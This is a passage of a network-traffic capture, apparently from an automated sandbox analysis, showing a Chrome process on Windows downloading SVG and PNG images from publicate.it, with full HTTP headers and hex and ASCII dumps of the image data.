                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC446INHTTP/1.1 204 No Content
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Server: Golfe2
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        82192.168.2.549868104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC923OUTGET /images/more_clients.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 4062
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "fde-620aa1d25f3b1"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zuyHX79xFMmOk%2Bd0Ca%2FlJB%2FM%2Fcu3t8rCTYpWijVJCms7ydRzW6wxj6xSFRg%2FV31H3pRu8jE24szIVqhzTKKI47RN39aNgALd3m9SLsjCET3Ok4Q0CVIiwCXrllFMJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c6485bc33e-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC616INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 30 37 33 31 37 30 37 2c 30 20 4c 31 30 37
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>8</title> <defs> <path d="M10.0731707,0 L107
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 20 72 61 64 69 75 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44
                                                                                                                                                                                                        Data Ascii: -2"> <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdD
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 32 38 35 30 30 38 38 2c 33 31 2e 33 38 36 34 33 30 37 20 43 39 2e 30 32 32 31 32 39 34 33 2c 33 31 2e 33 38 36 34 33 30 37 20 37 2e 30 37 35 31 37 31 35 33 2c 33 30 2e 39 38 39 36 39 32 31 20 35 2e 34 34 34 31 33 35 31 2c 33 30 2e 31 39 36 32 31 34 39 20 43 33 2e 38 31 33 30 39 38 36 38 2c 32 39 2e 34 30 32 37 33 37 38 20 32 2e 35 33 34 37 31 38 37 37 2c 32 38 2e 33 30 38 30 33 33 31 20 31 2e 36 30 38 39 39 35 33 39 2c 32 36 2e 39 31 32 31 30 31 31 20 43 30 2e 36 38 33 32 37 32 30 31 37 2c 32 35 2e 35 31 36 31 36 39 20 30 2e 31 34 36 39 34 30 32 31 39 2c 32 33 2e 39 33 36 35 36 31 36 20 30 2c 32 32 2e 31 37 33 32 37 39 20 4c 35 2e 35
                                                                                                                                                                                                        Data Ascii: o"> <path d="M11.2850088,31.3864307 C9.02212943,31.3864307 7.07517153,30.9896921 5.4441351,30.1962149 C3.81309868,29.4027378 2.53471877,28.3080331 1.60899539,26.9121011 C0.683272017,25.516169 0.146940219,23.9365616 0,22.173279 L5.5
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC708INData Raw: 31 37 2e 30 33 37 37 31 38 34 2c 32 39 2e 39 33 31 37 32 32 35 20 43 31 35 2e 33 37 37 32 39 33 39 2c 33 30 2e 39 30 31 35 32 38 20 31 33 2e 34 35 39 37 32 34 2c 33 31 2e 33 38 36 34 33 30 37 20 31 31 2e 32 38 35 30 30 38 38 2c 33 31 2e 33 38 36 34 33 30 37 20 5a 22 20 69 64 3d 22 50 61 74 68 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 69 64 3d 22 50 61 74 68 22 20 70 6f 69 6e 74 73 3d 22 32 38 2e 34 35 33 38 31 33 33 20 33 30 2e 38 35 37 34 34 35 39 20 34 30 2e 30 39 31 34 37 38 36 20 34 2e 38 30 34 39 34 35 31 35 20 32 34 2e 38 38 33 31 36 35 39 20 34 2e 38 30 34 39 34 35 31 35 20 32 34 2e 38 38 33 31 36 35 39 20 30 20 34 35 2e 39 31 30 33 31 31 32 20 30 20 34 35 2e 39
                                                                                                                                                                                                        Data Ascii: 17.0377184,29.9317225 C15.3772939,30.901528 13.459724,31.3864307 11.2850088,31.3864307 Z" id="Path"></path> <polygon id="Path" points="28.4538133 30.8574459 40.0914786 4.80494515 24.8831659 4.80494515 24.8831659 0 45.9103112 0 45.9


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        83192.168.2.549862104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC931OUTGET /images/features_review_icon.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 5606
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "15e6-620aa1d25b530"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BLxxWe4BpH0cxuKHKW8hlcXgs8fS40SJHfksOn9zpAhXPFj4AtNDQXGMrSZxxCml%2FFpn5uuSHUPZf9w%2FQrWHAWjufYjKX%2FIGKPsW99soqhHy4FKAfsEfwhFFTUSH8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c64fe27c8d-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC621INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 2a 08 06 00 00 00 f6 d4 14 17 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 c8 a0 03 00 04 00 00 00 01 00 00 00 2a 00 00 00 00 ea 87 8b 10 00 00 15 59 49 44 41 54 78 01 ed 9d 07 90 5c f5 79 c0 bf bd de fb 9d 4e ba d3 a9 9c 1a 48 a8 20 09 90 90 90 45 97 1d 44 2c 43 70 42 b0 c7 f1 24 0e b1 13 12 db 99 90 64 12 9b 89 13 32 61 86 d8 1e e3 d8 10 12 40 60 03 06 83 b0 69 c2 12 42 48 20 81 84 ea a9 5d af 3a 5d ef bd e4 f7 fd f7 f6 6e b5 da dd db 77 b7 2b bd cc ec a7 d1 6d 7d ff f7 bd af b7 ff 5b 91 30 84 29 10 a6 80 4f 0a 38 7a 47 07 37 9f ed 6a f2 f9 85
                                                                                                                                                                                                        Data Ascii: PNGIHDR*gAMAa8eXIfMM*i*YIDATx\yNH ED,CpB$d2a@`iBH ]:]nw+m}[0)O8zG7j
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 0b d7 f0 63 98 02 61 0a 8c 51 c0 dd 10 86 89 12 a6 40 98 02 1e 14 08 2b 88 07 41 c2 2f c3 14 70 a7 40 d0 14 24 82 0a 4e 52 44 34 6b db 25 86 74 bf 4c e7 f3 44 0a 11 51 76 c9 63 2e 45 4f e2 a8 da c5 69 ae 60 53 88 84 c7 4a 43 3b 83 ca a0 ca 62 b0 20 68 0a 92 16 15 2b b7 67 cd 97 18 8f 04 3b 58 88 06 63 9d 5b 32 e6 c9 8c 98 44 96 1a 09 c6 72 c1 5d 63 64 44 56 a5 cc 90 6b 53 e8 ff 50 f6 b4 1f 8c 48 2e a5 ed 5b 32 e7 db d6 04 c6 60 5c 54 06 d3 a9 82 06 0b 82 a3 20 30 b4 30 3e 53 1e 9e b7 49 d2 a3 15 39 fb 09 60 02 96 ef bb f3 6f 92 95 2a 80 08 a3 dd c0 01 cd be 3c 73 a5 dc 97 bb 5c 1c f4 31 6c 07 d0 6c 45 72 ae 7c 77 ee 06 49 88 8a b1 1d 7a 58 15 49 43 31 fe 7e fe 26 99 1f 9f 11 34 23 13 24 05 11 d9 98 51 20 6b 33 e6 c8 75 c9 b3 10 40 9b 31 98 06 94 32 77 5d
                                                                                                                                                                                                        Data Ascii: caQ@+A/p@$NRD4k%tLDQvc.EOi`SJC;b h+g;Xc[2Dr]cdDVkSPH.[2`\T 00>SI9`o*<s\1llEr|wIzXIC1~&4#$Q k3u@12w]
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 25 b0 ad cb 2b 38 cc 0e b9 dd cd e5 58 99 14 d9 36 f3 1a 29 40 18 ad c0 3c ac b6 fe f7 06 45 9d f5 f2 7e 4b 99 7c d8 56 e5 f4 1e de be 34 c9 7b fd 58 94 03 6d d5 32 0b fc ee cb 5b 21 6b d3 66 fb 64 94 b7 a5 32 50 aa 9b 70 c3 de e0 42 7f a7 bc 79 e1 b4 fc ae a9 44 ea 06 bb f8 8a 77 25 f7 76 ac eb 3d 15 d8 d3 dd cd f2 1e d7 99 8b 22 de 9c b9 00 4b a8 a3 38 81 81 1a a5 1b b4 9e ef 05 fa d8 3f a1 ca bb 8b b5 4f 75 35 5b 57 0e b3 66 84 9c 1f e8 94 5d 4d a5 d0 30 55 b6 e6 5e 2d b9 5a 7d 0c 18 1c b2 74 ac f0 e1 79 88 2a d5 67 ec 41 d9 77 a1 4a 3e 6e af 16 e5 d5 54 40 f7 89 ec 6b ad 92 7c 64 6f 1b 21 e7 72 12 71 2b a0 5e c5 d3 b3 b8 8e af e9 6d 93 d7 30 d0 bb a1 61 13 1b de 7c 69 88 0f 05 11 c2 82 51 39 d4 51 27 d5 7d ed 58 d1 16 f9 4a de b5 b2 3a 2d df a7 a5 71
                                                                                                                                                                                                        Data Ascii: %+8X6)@<E~K|V4{Xm2[!kfd2PpByDw%v="K8?Ou5[Wf]M0U^-Z}ty*gAwJ>nT@k|do!rq+^m0a|iQ9Q'}XJ:-q
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: ec 23 d7 20 81 ce 8e 89 97 26 12 fe 61 92 ea cb 05 4b e8 ec cf 1a bb af 96 e7 39 3b a8 fa a8 f2 6e 27 a4 3a 42 68 9b 4c c5 4d 13 67 cd 07 2f 0b c0 e3 8c 98 38 2a 97 f9 5e 4f 37 88 02 1d a2 f8 f0 32 85 16 ad d2 69 33 55 fb 7a f5 da eb b0 08 d6 15 04 bb a7 0d a2 6c 36 cf 78 42 07 56 f9 bd e6 62 39 4e 1c bf 3a 75 16 b9 ca 0a 6a d4 a9 f2 6f 25 7b 48 8c 3e c3 42 4f e1 74 9e 27 99 ec 35 4c 5a c5 58 c4 f5 94 7d 3d 61 98 b1 8e 03 ed 55 f2 3e 49 78 06 4a ab 61 e2 1c 92 bd 0f 5b ca e5 5b a7 7e 1b 7a eb a7 08 c1 ac 8c 98 64 53 b6 f4 56 2d 2a 21 87 7a d3 58 ef 7e f9 fa ec b5 a6 54 3e 48 b7 f8 9e a3 2f 4a c3 24 15 17 cf eb 9d ce eb 3f a4 bf 94 6a f6 f6 5c bc 4a 33 56 f9 1d 0c cb b9 de 26 fa 5c 0b e4 2f e6 5c cf 26 b4 24 79 b0 68 07 d5 ab b2 cb c6 e3 3b 33 af f1 5a 66
                                                                                                                                                                                                        Data Ascii: # &aK9;n':BhLMg/8*^O72i3Uzl6xBVb9N:ujo%{H>BOt'5LZX}=aU>IxJa[[~zdSV-*!zX~T>H/J$?j\J3V&\/\&$yh;3Zf
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC878INData Raw: 02 e8 ff 54 53 fd 54 43 4e bd 2b c8 31 bc c5 a3 a5 7b 48 26 cb a4 c5 54 f7 3c 4f e8 20 5f 13 29 56 43 43 df a9 98 fe c7 3f 16 6e c6 7b cf 33 d5 23 15 80 90 00 0b af 4b cd 37 9e ed 9f 29 7f 6b 69 b4 96 90 6a c4 f0 eb 62 1c d5 e0 d4 0d 76 e3 75 4f 48 39 3c fe 07 6e 88 b1 81 ca 5c 6a 54 3c 23 36 60 1f 22 1e e7 93 78 2f 63 b8 f3 67 28 c6 13 18 e1 62 06 0d 9d b3 5e 17 e3 a7 4c 6c c7 70 ab a1 d1 be 53 0d 7d 27 2d 2e 2d a5 3a a7 4d e5 40 99 6c 49 41 f4 76 2a 0f 43 38 ad 02 35 90 4c fa 3f 89 43 fa 68 1a 1d 25 27 f9 a7 73 bb cc 5e f0 2c 94 ab 5e 2d 74 88 24 50 a7 7a 5f 20 4e 7e 8f 70 a0 1c eb eb 1c d3 f7 24 9c 4b b4 9c bb aa 2b 68 3c fd b4 f2 a0 19 79 36 c3 84 58 a8 d0 80 6e 2e 8b c1 2b b4 ca 5f 9e 7a 43 8e 43 97 3e 42 ac c9 04 49 ef 1c ff 46 c3 69 18 dc 2e d7 20
                                                                                                                                                                                                        Data Ascii: TSTCN+1{H&T<O _)VCC?n{3#K7)kijbvuOH9<n\jT<#6`"x/cg(b^LlpS}'-.-:M@lIAv*C85L?Ch%'s^,^-t$Pz_ N~p$K+h<y6Xn.+_zCC>BIFi.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        84192.168.2.549858104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC978OUTGET /images/adobe_review.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:24 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 8100
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:04 GMT
                                                                                                                                                                                                        etag: "1fa4-620aa1d1336be"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxMqWDpnmalflzx7mleGvpW%2FRBwdtr4Lb5gk3zlOFWkczNiUKxrPXuQljrBlkclT0v9Qo1qNh2kMYo6ZNAHTORqgBE7eWocZL6UhkzsKmD7pke6w5eoJgYiWfmZ9OA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c64e0a8c69-EWR
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC627INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 82 00 00 00 82 08 06 00 00 00 8a 03 10 fd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 35 20 37 39 2e 31 36 34 35 39 30 2c 20 32 30 32 30 2f 31 32 2f 30 39 2d 31 31 3a 35 37 3a 34 34 20 20
                                                                                                                                                                                                        Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 31 35 33 31 41 37 41 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 31 35 33 31 41 37 37 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 31 35 33 31 41 37 38 33 36 31 34 31 31 45 44 38 31 31 37 41 36 41 39 45 42 42 38 41 32 37 46 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f
                                                                                                                                                                                                        Data Ascii: cumentID="xmp.did:51531A7A361411ED8117A6A9EBB8A27F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51531A77361411ED8117A6A9EBB8A27F" stRef:documentID="xmp.did:51531A78361411ED8117A6A9EBB8A27F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
                                                                                                                                                                                                        2024-08-30 16:16:24 UTC1369INData Raw: f7 cf 4e 99 f6 b1 27 c9 d0 9d 08 9a f3 bf dd 48 90 9d b3 3a 21 3e ee d5 11 51 11 7a 59 e0 45 2b ab a8 92 8b 8b 4b 1e 99 95 32 6d a3 13 b0 5d d2 11 b6 44 e8 5b 3a 40 12 8c 4c 4c f8 6b 64 44 98 8e 54 3f 58 65 55 0d a6 8a 0b 0f 3b 21 83 4b 91 c1 19 11 34 3f a7 74 90 18 1f b7 5d 8f 04 fd 6b e5 18 19 8a 8a 4b 56 3a 49 13 9a 9f 0b 1a ea 4c a7 15 45 56 d6 a1 79 a4 09 74 12 f4 bf 91 cf c9 f7 84 81 c6 9e 81 43 2c 05 37 74 41 d7 df 99 99 99 93 47 44 8f d8 a1 0b c3 ab 67 e4 7b c2 80 b0 e8 0d 2f 67 e9 5e 70 97 04 7b f6 ec 89 8f 8c 8e fb 98 4a 44 1d 8e ab 6b 84 01 61 41 98 b8 4b 06 b1 97 aa c1 ee ce d6 ae 5d 2b 2d 5c b4 e4 c3 a4 31 a3 26 e9 2d e3 ab 6f d4 ab 09 0e 32 99 5a db 95 d9 96 f6 d6 cd d9 d9 d9 8a ab 64 60 1d 64 d0 4c 02 fa fb d0 e1 a3 bf 99 38 7e dc 13 7a db
                                                                                                                                                                                                        Data Ascii: N'H:!>QzYE+K2m]D[:@LLkdDT?XeU;!K4?t]kKV:ILEVytC,7tAGDg{/g^p{JDkaAK]+-\1&-o2Zd`dL8~z
